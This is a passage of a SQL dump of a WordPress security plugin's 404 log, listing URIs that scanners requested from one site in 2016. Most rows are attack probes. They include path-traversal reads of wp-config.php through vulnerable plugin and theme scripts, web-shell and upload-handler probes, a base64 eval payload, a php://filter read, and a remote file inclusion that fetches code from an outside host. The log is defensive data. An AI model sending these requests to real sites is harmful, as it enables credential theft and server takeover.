(0xc5770f545ea4fc95fd367526d4b8d909, 1471609924, '/adodb.class.php?array=ZXZhbCgnZWNobyAxNTIyMzM7Jyk='),
(0x9f792001cf3e6404db1c8b57b438e41c, 1471609943, '/wp-includes/Text/Diff/Engine/sess.php'),
(0x56df9e961b79a84bd4e7aa2cb9b882ff, 1471609954, '/authorize.php'),
(0xd5605f21ddd9486d8ace179fbf3aa740, 1471609963, '/cacheplugin.php'),
(0xd3bce84ac7ddbf64cb8bf725d771010f, 1471609978, '/wp-admin/security.php'),
(0x797d971626cc883513ac0900e0a6c2f9, 1471609984, '/wp-misc.php?t1295n=1'),
(0x618f032e949cf9b145ed7eade555534d, 1471609996, '/security.php'),
(0x2252b54cd873b0cb57532fec89b3f59f, 1471610006, '/wp-content/security.php'),
(0xba316d90dfe480f5fadbef77caab5087, 1471610024, '/wp-installation.php'),
(0x77b4995704ca9b6668a71872bdba5ce1, 1471610043, '/wp-includes/security.php'),
(0x584c0218f7bb4f47b00b457515de8918, 1471610053, '/post.php'),
(0x97512090ab6db7f4af8a4f8098c16821, 1471610060, '/wp-content/login.php?login=cmd'),
(0x8342b74109c6ba6ac96870821ffa238a, 1471610069, '/login.php?login=cmd'),
(0x611728815559b7479e6d495631fd2fab, 1471610077, '/systemcache.php'),
(0x0c5669311d1dc306035a92db1fec3d4a, 1471610085, '/modx.php'),
(0x60e8369d38bea4b4058cfdfeb27e6c81, 1471610093, '/4005.php'),
(0xd75df61d163cdf91243dfac1087f166d, 1471610098, '/load-config.php.php'),
(0x7747911523786a534e2326b9077e92c7, 1471610105, '/privacy.php?youfindit=1'),
(0x2c0d1a1225e38d06d538ca02cc818d41, 1471610120, '/stats.php'),
(0xa40eee5cde82dba803af1ab0254e5027, 1471610121, '/shell.php'),
(0xde490ef1e193c61fcacc6ae756294853, 1471634949, '/wp-content/themes/radial-theme/functions/upload-handler.php'),
(0x3c859a7e865d270e4f50f5111142dc89, 1471694005, '/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.css'),
(0x05a41d784d61edb12e0b7af3283b81a9, 1471766372, '/wp-content/uploads/wpcf7_captcha/2000649787.png'),
(0xde6b5d06f3ec4e5a566a4749131f2801, 1471781540, '/wp-content/uploads/wpcf7_captcha/1519059757.png'),
(0x332a9f2d6c51894804dee7b87ca4fe3d, 1471804923, '/wp-admin/includes/image-import.php'),
(0xaf07ac927861a7c8c4b7ee82db10c4a0, 1471816203, '/wp-content/uploads/pl40d2dn.php'),
(0x98cbf373ad44e75c2184198f44a4f036, 1471816204, '/wp-content/uploads/nb6pb4bf.php'),
(0x3d21cad1738daf5e4787e73983f3a858, 1471816205, '/wp-content/plugins/revslider/temp/update_extract/68brxnv8.php'),
(0x3ec6fba921e2d3ab7b392cf75fd5cbde, 1471890006, '/wp-content/plugins/wp-symposium/readme.txt'),
(0xf36ab38f94e93474ec07ce65d0c02312, 1471901179, '/modules/columnadverts/uploadimage.php'),
(0x69d4e8d9b71f1069cae5d7ba3565c379, 1471936420, '/?gf_page=upload'),
(0xfa9a5fc4342fb61fddd4d74de8359c41, 1471961982, '/modules/homepageadvertise/uploadimage.php'),
(0xac70dcde7fffc0fe21de8910e4c18a0d, 1471970596, '/wp-content/themes/clockstone/style.css'),
(0xcacf9ab6f5875983196e851125c09cf0, 1471981619, '/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php'),
(0x23c53773c34f8f78b9ca6fc985db6b4e, 1472011337, '/404.php'),
(0x273c0e49a7071901225f6545bcb820c1, 1472032628, '/modules/simpleslideshow/uploadimage.php'),
(0xbbe295a35d2826b19ae4420e7ad19772, 1472060400, '/wp-content/themes/Clockstone/style.css'),
(0x871e6d05ea69c825ed0a88bba07aa560, 1472063406, '/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php'),
(0x297db4d1c6e41c130a3c3bff1313dbf2, 1472066977, '/wp-content/themes/headway-163/style.css'),
(0x9a16ffd4aa677fae1d6b6ceae890784f, 1472076336, '/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php'),
(0x59c9ef9cf0a5b3d43dbdf2129231a23f, 1472122277, '/wp-content/themes/headway-166/style.css'),
(0x5f9dfb9d8e8ffd7bb7f407a60f1b32cf, 1472147543, '/wp-content/plugins/wp-checkout/vendors/timthumb.php'),
(0xcd2d665e4543ac89fadad1fcf7423a10, 1472174876, '/wp-options.php'),
(0xe6690f0e65df6198b4e6436776aa5584, 1472181239, '/wp-content/plugins/estatik/front_templates/css/es_front_style.css'),
(0x90d1396d31e80fd6f799d93375f1ab63, 1472185105, '/modules/productpageadverts/uploadimage.php'),
(0x0504e9b8c7e9acc655e3f413f9adf3e9, 1472192555, '/404_error.php'),
(0xe576072c6a6389e397dc03a8d872e34e, 1472210978, '/wp-content/themes/brainstorm/style.css'),
(0x5352bd93fb5e5a217b4d5ca8cbe5ba00, 1472245074, '/wp-content/plugins/wp-checkout/css/colorbox.css'),
(0x4982c4a139dc125c199dca26a5d7a869, 1472265979, '/wp-content/plugins/boxit/upload.php'),
(0xec9ce52a3ca985dc603ce7ddcc73af51, 1472284627, '/wp-content/plugins/1-flash-gallery/readme.txt'),
(0xc2cabd24084b15e984984229956ad81f, 1472322985, '/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.css'),
(0x28fb22742ce2dc5982b5d80b2ce6a50d, 1472323561, '/wp-includes/routing.php'),
(0xcfe9e250b0dabebbfd1a7977fb63cdfc, 1472323561, '/wp-indeks.php'),
(0x6a85f358e908b7d0e7b5996c06ee623f, 1472343903, '/wp-content/plugins/php-event-calendar/server/classes/uploadify.php'),
(0x0fbc8edaa07118622ca1053797efd554, 1472363210, '/wp-admin/includes/images.php'),
(0x02c9377af4174634e7a0884a3d29f5ee, 1472363216, '/wp-admin/includes/index.php'),
(0x8b76173a68685227ee21db7779446899, 1472363217, '/wp-admin/includes/newfile.php'),
(0x1df11162da5daa87b88523c5957092f9, 1472363219, '/wp-admin/includes/sos.php'),
(0x30ccd0772b5f19b506d021e0a1511d31, 1472363220, '/wp-admin/includes/w2.php'),
(0xe6cfcc0c91d7f5ee5945f055ec5aeb9a, 1472363222, '/wp-admin/includes/wp-object-cache.php'),
(0x32e2f7b061dc0786051e0d3540f6d22b, 1472363224, '/wp-admin/js/.api.php'),
(0x0c91ec94eef0ba13641a2bd0861d3f24, 1472363225, '/wp-admin/js/bin.php'),
(0x26f9e7e8cc8e4707ab3137d36bf5259f, 1472393178, '/js/webforms/upload/'),
(0x4298c8f8da178b04c169c5e7772a6b7a, 1472473489, '/wp-content/plugins/wp-dreamworkgallery/css/admin.css'),
(0xf7e728a08aa2cdd06e627791c762caf3, 1472489333, '/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php'),
(0x93d64a8865167a47116874eeb513908e, 1472522602, '/configbak.php'),
(0x23229a0e384008921c228badab7a4413, 1472547414, '/admin.php'),
(0x64622368777435c91b2ddf48e8e43510, 1472553905, '/wp-content/plugins/wp-homepage-slideshow/readme.txt'),
(0x0c1b1c41bc1564fe146d1b4bdeb1930b, 1472554218, '/zxr.html'),
(0xe4d635b6081cbea5bfb59e7121434599, 1472568458, '/wp-content/plugins/wp-dreamworkgallery/js/swfupload/js/upload.php'),
(0xa3c2bf2ee57f78762d5446c0388b2eaf, 1472640224, '/wp-content/plugins/wp-formgenerator/uploads/php'),
(0xc8fb83bd9d91ce2ccddb163d8527d2f3, 1472705970, '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'),
(0x156936c523b2d9b01618f44a32e59415, 1473075992, '/wp-content/plugins/wp-bliss-gallery/readme.txt'),
(0xf2c5b5da3ac1f1694311b56683c4e5c5, 1473103869, '/wp-content/plugins/wp-catprogallery/readme.txt'),
(0xcaba251d195e6ba820c38ff9f65367ed, 1473150074, '/phpmyadmin/scripts/setup.php'),
(0x9b8f2b2341392b80e95f221f10806954, 1473150075, '/phpMyAdmin/scripts/setup.php'),
(0x5de26861f90848af365283259a3c8424, 1473150075, '/PMA/scripts/setup.php'),
(0xbd0834c66d75f6ec032aece685499ccf, 1473150075, '/pma/scripts/setup.php'),
(0x06cef0d4da771fac08a6d534a22f5714, 1473150076, '/sql/scripts/setup.php'),
(0x5d94e1a809b1d0c421475ec51b6462cd, 1473150077, '/admin/scripts/setup.php'),
(0x2e02fcc02ff2a35563468fda0b289b7a, 1473150077, '/dbadmin/scripts/setup.php'),
(0xa057d3f2212bb0df484e6ccea39f18af, 1473150078, '/mysql/scripts/setup.php'),
(0xd8c1b1d9b683d148b005904d3ab52bde, 1473150079, '/myadmin/scripts/setup.php'),
(0xf2cecba6fbd55f334fc56527dc03bdca, 1473150079, '/mysqladmin/scripts/setup.php'),
(0x83974fcdb0f01748ff688514ce1e3f9c, 1473281651, '/wp-content/uploads/wpcf7_captcha/107101539.png'),
(0x91abbae9b1437c58bff7e7150fdd28e9, 1473301389, '/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'),
(0xf77ae27dc6ae18347ca4610e87c366b7, 1473459419, '/wp-content/plugins/cysteme-finder/css/theme.css'),
(0x424f7fec95d2608eaf74afd08a062113, 1473464790, '/wp-content/plugins/contact-form-7/includes/js/\\\'+m.iframeSrc+\\\''),
(0xfd22ccf97697606953f165756b840aa6, 1473564182, '/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css'),
(0x13175a9e310525157bf880988d0fa8a2, 1473607774, '/wp-content/plugins/add-from-server/screenshot-1.png'),
(0x73fd51f7fba8eeb224691c41b63cf090, 1473634899, '/wp-content/plugins/iwp-client/readme.txt'),
(0x588818c5d9f51740eff663c09584824f, 1473731058, '/cache.php'),
(0x8c024e23a65d0a86c4eccc932d15064d, 1473877927, '/wp-includes/insmod.php'),
(0x94a0fbaebfc76a1c2a27df775dda3510, 1473903057, '/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php'),
(0x5473a30915eae54c3866b6bb2989defa, 1473980776, '/wp-content/plugins/cysteme-finder/php/connector.php'),
(0xf9b2b4ef6dcfd8e0aae37e43a48419d0, 1474130653, '/wp-content/themes/bordeaux-theme/functions/upload-handler.php'),
(0xa71fc90c564a93fe66be59a0ec39ffef, 1474133839, '/wp-content/themes/cameleonthemeforest/includes/fileuploader/upload_handler.php'),
(0x29cb2c73cd8a30d8d0c166e2db1cef6a, 1474168119, '/zabbix/'),
(0xb8bf8ae7013e1eb6d5f3f60d35ad7dbc, 1474243934, '/wp-content/plugins/attachment-manager/xavisys-plugin-framework.css'),
(0xb6f25b4c3be1c95ba56d07b09c4f0b2c, 1474325628, '/wp-content/plugins/cherry-plugin/admin/import-export/import.php'),
(0x1de145482a09221530ee7d1bb738c5c8, 1474330125, '/wp-content/uploads/hrv68rd2.php'),
(0xe9e1ef9665e46d3f1503dab80feb881b, 1474330126, '/wp-content/uploads/4xrtz64t.php'),
(0x2ac6c60d8102edb2db1602a10d4f74e8, 1474330127, '/wp-content/plugins/revslider/temp/update_extract/86r6v220.php'),
(0x1b1ecdb5b584c333b6c9a1f89c8258f8, 1474339208, '/wp-content/plugins/front-end-upload/readme.txt'),
(0xdc2f6f985e966615dd7e71f061dccd87, 1474344730, '/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.ghanachambertakoradi.org/tmp/db.php'),
(0x5569ce7e0239501ae7d2cb192783984a, 1474344746, '/wp-content/plugins/wp-symposium/server/php/EMmGPhOnlpXMsV.php'),
(0xe901fda38becab8dc50d1fd4fc499749, 1474362140, '/wp-content/plugins/woocommerce-product-addon/readme.txt'),
(0xacf565dec17c6bc38acd136c98b3a184, 1474393935, '/wp-content/plugins/addblockblocker/style.css'),
(0xe4be77bcbb9fb276923864fe289a244f, 1474420638, '/wp-content/plugins/piecemaker/php.php'),
(0x82e82e1e59ee775cd384994ae26015e1, 1474510454, '/wp-content/plugins/genesis-simple-defaults/readme.txt'),
(0x0de91bd58d7737ff93ab3a510e56edf2, 1474618270, '/wp-content/plugins/downloads-manager/single-download-template.tpl'),
(0x0ac6c3991f15aa31c96795a895faf075, 1474755348, '/wp-content/themes/eptonic-v1.4.3/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x30a2faa18f0dd338a8136ef52d583135, 1474763573, '/wp-content/plugins/jssor-slider/assets/css/jssor-slider.css'),
(0x36d3d365e259e18ddf3c9f8e7c7ab0bc, 1474833316, '/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php'),
(0x7d85c3ee95fb4adbc438520a15049949, 1474863287, '/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php'),
(0x132b9a602beb5b7643574cd830854b4a, 1474911750, '/wp-content/plugins/liveforms/views/css/front.css'),
(0x99f93214bd0c05ea636e63ea132fe1b5, 1475039098, '/wp-content/plugins/wpstorecart/css/wpsc-checkout.css'),
(0x8c9741130cad624a5f414bb33a0c1bf8, 1475063888, '/wp-imporst.php'),
(0x3793665eed1a3f7d0704d55e1e4532ca, 1475102283, '/wp-content/themes/Nuance/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x7991e7d68aa09855fa6ce5e13bd8b217, 1475110702, '/wp-admin/js/mssqli.php'),
(0x47392ea35b12ad5a98184406b1eeb6fe, 1475110726, '/wp-admin/js/mysqld.php?9c25c3f2=1'),
(0xd53de1804ca9b136cbbfcb60dbea50b8, 1475110799, '/wp-admin/media-parse-new.php'),
(0xf1432b688b1a6790668605435770161c, 1475110827, '/wp-admin/network/404.php'),
(0xc311b5d658a269ab264d36459fd20ceb, 1475110856, '/wp-admin/support.php'),
(0xb6cc180d3bc649930cd8bd46b46531f3, 1475117732, '/feed2js/magpie_debug.php'),
(0x4382e80c5f9375a0a222d79e3d20280c, 1475173737, '/wp-content/themes/nuance-v1.2.3/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x6c22cecb3f8ac1e7d1f7149d0a4dfcc7, 1475205575, '/wp-content/themes/awake/lib/scripts/dl-skin.php'),
(0x573e6264e401a6652a6064aa63bf372a, 1475223343, '/wp-admin/js/system.php'),
(0x520bb982ef2872d8669a11e1adcc6701, 1475223343, '/wp-admin/css/system.php'),
(0x41043aa68081e497f1f2dde5254fcdb3, 1475223343, '/wp-admin/maint/system.php'),
(0xff2c631e2ed095584d2238122321cc73, 1475223344, '/wp-admin/network/system.php'),
(0x48a32daf550a70061789025948796df7, 1475223377, '/wp-content/uploads/2014/ini.php'),
(0xa5e2a4c66b68ca9c891bcdef5fecbdb0, 1475223377, '/wp-includes/certificates/system.php'),
(0xe9d18d722de30abbbc679b48cf39e974, 1475223377, '/wp-includes/core.php'),
(0x9af3739847d45b97d872953de4de3b43, 1475223378, '/wp-content/themes/twentytwelve/inc/main.php'),
(0x985a3240f75d8e998c461ba7c7fe2a2c, 1475223378, '/wp-includes/fonts/system.php'),
(0x6a5a3eac6df0e50fcacd732bdf24920a, 1475223378, '/wp-includes/id3/system.php'),
(0x85be3e8bee6ebc9d11de7aee6e066fbc, 1475223378, '/wp-includes/css/maink.php'),
(0xa7a2a8689138c43899800a6c813d37ca, 1475223378, '/wp-includes/css/system.php'),
(0xa4e9c81112e7335eaef06e2978e50103, 1475223409, '/wp-includes/js/tinymce/themes/advanced/skins/default/img/main.php'),
(0xf5cc02b5c24b098c52bf76e4ddd595fe, 1475223409, '/wp-includes/js/jquery/ui/main.php'),
(0x0d0dfe552470b063250afc528bed4f03, 1475223410, '/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/main.php'),
(0x29a8249914ca819480599c30f420a27f, 1475223410, '/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/class.php'),
(0xcab5239178020d6598fd41862b8c433a, 1475223410, '/wp-includes/js/tinymce/themes/advanced/skins/default/class.php'),
(0x9bb7365b0331ac918c8e6092611cf0fb, 1475223410, '/wp-includes/js/tinymce/langs/main.php'),
(0x39c5a6a534617b2d9ce7de65ab789218, 1475223410, '/wp-includes/js/tinymce/themes/advanced/skins/default/img/class.php'),
(0x3de860b25883285debab858062a069fa, 1475223443, '/wp-includes/js/tinymce/themes/main.php'),
(0xb9d6d3187c804510922da0ee3ecd0e26, 1475223443, '/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/main.php'),
(0x4dde565ab20721f883db185baa966f11, 1475223443, '/wp-includes/theme-compat/maink.php'),
(0x6a3314f9bb5059e1c58ff18d97d8fb1a, 1475223443, '/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/class.php'),
(0x10251462099f1df85795d0f8dd76b695, 1475223443, '/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/class.php'),
(0x6d666f6a3ff07d589efe0be28178f3bb, 1475223443, '/wp-includes/theme-compat/system.php'),
(0x462651ae1ea148b4df86b4ca01d6d4b1, 1475223443, '/wp-includes/simplepie/system.php'),
(0x3712d47bc96b3c5f742829dbdc10d4fa, 1475223443, '/wp-includes/js/tinymce/utils/main.php'),
(0xf60ce7565ca4dc8826457e1f9b1c21df, 1475223443, '/wp-includes/text/system.php'),
(0xb81b473420adbda2e0168f6fb5b92b6c, 1475338899, '/page/2/'),
(0x0fbab7edd0d4dab4bf31d3d31408c245, 1475338902, '/page/3/'),
(0x9e114c435bb4b681f9619ff3e7b3bbf6, 1475338904, '/page/4/'),
(0x5691cbcd1f6129dc3262ebee63fa0cff, 1475338907, '/page/5/'),
(0xf09ad30d8abdcb5a89371a979a96caa6, 1475338910, '/page/6/'),
(0x5f4a74c197137c3f9a65dfa4165022cc, 1475493889, '/comments/feed'),
(0x90b7d0be72eba3d2914291874151e590, 1475493898, '/wp-includes/js/jquery/).enctype,t.html5Clone='),
(0x04c4380bd6024a018c4847ea2754be4a, 1475493898, '/wp-includes/js/jquery/).length,t.htmlSerialize=!!d.getElementsByTagName('),
(0xc9c9bf390142cf20f83bc84ceff1ae63, 1475493899, '/wp-includes/js/jquery/,data:n}).done(function(e){o=arguments,s.html(i?x('),
(0x367aecd1c781257b5343e136d699f063, 1475493899, '/wp-includes/js/jquery/],_default:x.support.htmlSerialize?[0,'),
(0x5dec4d92b264e558e345638343b83b5c, 1475493900, '/https:/www.facebook.com/CrossTrainingNamur'),
(0xe31d9c0746221eecced9eee143e426f5, 1475493907, '/www.youtube.com/embed/_os-BkWwGKU'),
(0xfbebc64d8efe5514d23ac61c114b89e6, 1475493907, '/www.youtube.com/embed/dgKynOMF_HI'),
(0x4d86166b836cb24b696d829c5533bf9d, 1475493909, '/wp-includes/js/jquery/===n?(t.parentNode&&(t.outerHTML=e.outerHTML),x.support.html5Clone&&e.innerHTML&&!x.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):'),
(0x950e94f0631d4ca99e71decdf6bc37d0, 1475493910, '/wp-content/plugins/slideshow-manager/coin-slider/+el.id).html(titles[el.id][imagePos[el.id]])}else{$('),
(0xe12b724313ab10a683c49f173cce326b, 1475493911, '/wp-includes/js/jquery/ui/).addClass(this._triggerClass).html(a?t('),
(0x76aba1067d8d200dbf300a0c0167b57e, 1475681218, '/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php'),
(0x2f403a8af0b35d944f8be8b1b38480b3, 1475737139, '/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php'),
(0x527605ab36acff0ace18ec54ac204d6e, 1475877210, '/?author=5'),
(0xe789486a9d13e576b54c095abbc104ba, 1475898585, '/m/'),
(0xdec05a813e04a70c40d2c027fb4b325b, 1475961962, '/wp-content/themes/area53-v1.0.1/framework/_scripts/valums_uploader/php.php'),
(0x74ede1af5803fe3bb89811d32811ef72, 1475963379, '/wp-temp-x43.php'),
(0x37181c1eba702e54a4b5df10a6eb7805, 1476199036, '/wp-content/themes/area53-v1.0.3/framework/_scripts/valums_uploader/php.php'),
(0xfae2f2a2cc1e56e632abe1b99534904c, 1476292383, '/wp-content/plugins/wp-mobile-detector/readme.txt'),
(0xfcb0b85b71e6b14d8d3f48d28330490a, 1476296147, '/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x1b94118dd465193e1231fb7d50961d12, 1476296147, '/wp-content/plugins/contact-form-7/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x89ec0ea9e628ff7a1e9cba4d43fe6262, 1476296147, '/input.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x1afacc0223d5360eda8b62866b114478, 1476296150, '/wp-content/restarts/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x362cf801e5d3bb289f9aaccc19e8e6b1, 1476296158, '/wp-content/restarts/input.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x6ea96fc2b697bea25af8a7377e853f0e, 1476296166, '/wp-content/plugins/revslider/temp/inbox/input.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0xec9b084c3bc7ad3dc0eeb8946fd53d35, 1476296190, '/wp-content/plugins/revslider/temp/inbox/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x91bc8fb0439c22353994765639d4c75a, 1476382732, '/wp-content/plugins/wpmarketplace/css/extends_page.css');
INSERT INTO `wp_wfNet404s` (`sig`, `ctime`, `URI`) VALUES
(0xfd5940ead01fcf33980dfbd38864c872, 1476447247, '/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php'),
(0x098700fe4192b975a9c16ace2ffa882b, 1476464615, '/wp-content/themes/cubed_v1.2/style.css'),
(0x5b1d03ee152966a85ee86ba4433d9de8, 1476541049, '/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php'),
(0x7e1f072210c37857669590d9040cbdc8, 1476549119, '/wp-content/themes/area53-v1.0.4/framework/_scripts/valums_uploader/php.php'),
(0xb79bde9c0311410cd3632b209ff63bbf, 1476596654, '/include/fckeditor/editor/'),
(0xf72c01d3481f535503a5f6d5c692c86d, 1476596654, '/common/fckeditor/editor/'),
(0xd6b526c60495173df48ecbd35e87fdbc, 1476596654, '/manage/fckeditor/editor/'),
(0xb29a60c725cb00519284470bd4f3983a, 1476596654, '/editor/editor/'),
(0xc4165ebde6c98d64b6cbea66331b832a, 1476684326, '/wp-content/plugins/the-viddler-wordpress-plugin/css/viddler-wordpress.css'),
(0x242bb80f982712df4d46005a003082fc, 1476692897, '/language/en-GB/en-GB.xml'),
(0x6d7a3181a9e138477be81922747f729b, 1476762580, '/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php'),
(0x9805f24a041d7fec6d4f5f1d082272b6, 1476896331, '/wp-content/themes/area53-v1.0.5/framework/_scripts/valums_uploader/php.php'),
(0x2cfc34fc4b13ba6dada99ec040eed7ad, 1476923484, '/blog/wp-admin/setup-config.php'),
(0x18df2f7a65d6a9e4c4a0199ec6624b13, 1476923484, '/wordpress/wp-admin/setup-config.php'),
(0x3911ab8f0e3ed3ab23b4fdd8d8e4b593, 1476923484, '/wp/wp-admin/setup-config.php'),
(0x995105a5232d034c1e21d5536227595b, 1476923485, '/backup/wp-admin/setup-config.php'),
(0xf271b17bcf158462260c4dc903aec774, 1476923485, '/blog/wordpress/wp-admin/setup-config.php'),
(0xdfb20530d30351af82622312f834c025, 1476923485, '/news/wp-admin/setup-config.php'),
(0x108010c233bc4f41d5e2a76d41180342, 1476923485, '/wordpress/wordpress/wp-admin/setup-config.php'),
(0xca948ecaad4eace7d42a83e5ff3c610b, 1476987561, '/wp-content/themes/graphene/style.css'),
(0xb04f961e018eb25de3d042f8dafbd467, 1476997238, '/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=ZnVuYy5waHA%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xadfcaf39cc7eabd00225b51c6ed43294, 1476997248, '/wp-content/plugins/func.php'),
(0xc0ced43b37e6e92774f02273ac609b79, 1477036566, '/wp-content/themes/twentyfifteen/wp-installation.php'),
(0x023027a68d940136806779710e9b0012, 1477071727, '/wp-content/themes/graphene-child/style.css'),
(0xd8f88deb95902a021c20541627baea74, 1477314547, '/?author=6'),
(0xcebcff07597c6477b4864641377ba6f5, 1477315874, '/?author=7'),
(0xe7e714edc7f4ccd0ff9693c1c45385a1, 1477317218, '/?author=8'),
(0x2193cd55edcdc1bce0b42296812bb64e, 1477318582, '/?author=9'),
(0x77f0593e9410c4a8db4a728e77dc11df, 1477319940, '/?author=10'),
(0x22800a0e700ee3661b9d5e7ade3ebd12, 1477397007, '/mobile/'),
(0x53967870e59ae54049ba292a32b07d4c, 1477410587, '/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php'),
(0x681043755738d33224671129f5930153, 1477470668, '/wp-content/uploads/user_uploads/db.php'),
(0x69cefcd6578710a8a6989d9ae1c2f81d, 1477470671, '/wp-content/uploads/wpmp-previews/db.php'),
(0xe70f206690d138cce2c5f4ff5287dacc, 1477484352, '/wp-readme.php'),
(0xf808f7268b59457e2084fa7fa9448aae, 1477582685, '/wp-content/themes/infocus2/lib/scripts/dl-skin.php'),
(0xd93e9cc446d856b22ed8c6f55f807c9f, 1477605380, '/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php'),
(0x841c3ed422bc02478fdf37e5ddd7c4e3, 1477621020, '/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php'),
(0x35ad88921940c908010e3d4f417f863f, 1477640556, '/wp-content/themes/echelon/lib/scripts/dl-skin.php'),
(0x242d14e47d7d99e278a77f3ef188b2fa, 1477720699, '/wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA=='),
(0x8b2762a059c276c01b5dd352a899aae2, 1477740109, '/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php'),
(0xeafbc91c61c94ab52be121748a556d86, 1477747460, '/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php'),
(0x83295ae33a22cec3e5a135dd360ca53d, 1477757994, '/wp-content/themes/myriad/lib/scripts/dl-skin.php'),
(0x1c5d31ceab1ef2ad2cf6ceebaf16a1d9, 1477768824, '/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download'),
(0x53b4d1db75c3427f46e038cca61aacce, 1477776185, '/wp-content/plugins/custom-contact-forms/css/custom-contact-forms.css'),
(0xf84d8583577e40ac5c62aef80b14fcea, 1477796652, '/wp-content/themes/construct/lib/scripts/dl-skin.php'),
(0x06ef1d019254c95d4e6572e085a2b901, 1477811816, '/wp-content/themes/fusion/lib/scripts/dl-skin.php'),
(0xa4d40518ad62ca353ad559cfe288b3ad, 1477832889, '/wp-content/uploads/shell.php'),
(0x81124fdabeba4145328e48c0fc2c968d, 1477835848, '/wp-content/themes/infocus/lib/scripts/dl-skin.php'),
(0x1153b827ff3dfad3d7e7bc1f1c5f91da, 1477841866, '/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'),
(0x79351b7a2025816272a4ae59cbe9c402, 1477845664, '/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=../../../../wp-config.php'),
(0x148689635857ecf84122d186ce97fed9, 1477856392, '/wsososo.php'),
(0x295739767a668f2bdbaca3b404bed174, 1477870281, '/wp-content/plugins/image-export/download.php?file=../../../wp-config.php'),
(0x6c0c7319930b0b4ad61e4aa150bf48d3, 1477878945, '/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php'),
(0x04118ad3af3a01a0bf6248e89574f909, 1477904544, '/wp-content/themes/lote27/download.php?download=../../../wp-config.php'),
(0x566a7d6be079e97094f6d9a68ae7c65d, 1477916294, '/wp-content/themes/dejavu/lib/scripts/dl-skin.php'),
(0x2e3b9561b25b3869ca9a5e0383e2136a, 1477952210, '/wp-content/themes/elegance/lib/scripts/dl-skin.php'),
(0x6fcefafc0478321d87652586b024a70b, 1477980102, '/wp-content/plugins/revslider/release_log.txt'),
(0xf6592da91949ab828ecb4712d27e31e6, 1477982831, '/wp-content/themes/method/lib/scripts/dl-skin.php'),
(0x7e2e6211b07cfc88900b5d826be4658b, 1478001482, '/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php'),
(0x5e66ebf05c90269708ae069a1b8192e2, 1478028585, '/wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php'),
(0x6050e80675cc3b50e0a314dbb81ef810, 1478048977, '/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php'),
(0xf6d2bb5f4f6fb9c9c0b74fb4f6f119b9, 1478055125, '/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=../../../wp-config.php'),
(0xa3e7ce0228f318d7947b0b30240327c3, 1478091583, '/wp-content/themes/persuasion/lib/scripts/dl-skin.php'),
(0x185010fe1d39a140e5f767dacd8006c7, 1478155392, '/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php'),
(0x47f8434011968e6926044f30dab94d40, 1478175023, '/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php'),
(0x9bcc69f142b9e3cd19a07f62a62d72fd, 1478191652, '/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../wp-config.php'),
(0x7d5f8e71e16d5feea91a89cb2178ca52, 1478210360, '/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php'),
